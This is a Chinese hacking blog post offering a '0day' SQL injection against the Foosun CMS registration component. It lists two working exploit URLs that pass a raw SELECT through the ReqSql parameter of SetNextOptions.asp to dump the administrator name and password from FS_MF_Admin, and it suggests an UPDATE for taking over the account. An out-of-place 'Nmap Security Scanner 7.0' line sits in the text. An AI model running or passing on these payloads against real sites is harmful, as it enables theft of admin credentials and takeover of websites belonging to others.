当前位置: iick's blog > 网站漏洞 > foosun 0day 最新注入漏洞

foosun 0day 最新注入漏洞

作者:hack1990 时间:11-08-07 阅读数:906人阅读

风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。

漏洞文件:www.hack1990.com/user/SetNextOptions.asp
利用简单的方法:

暴管理员帐号:
http://www.iick.blog/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码:
http://www.iick.blog/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

如果得不到密码黑阔们也可以考虑 update

# Nmap Security Scanner 7.0

上一篇:科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具

下一篇:防注入通用手段

相关文章

发表评论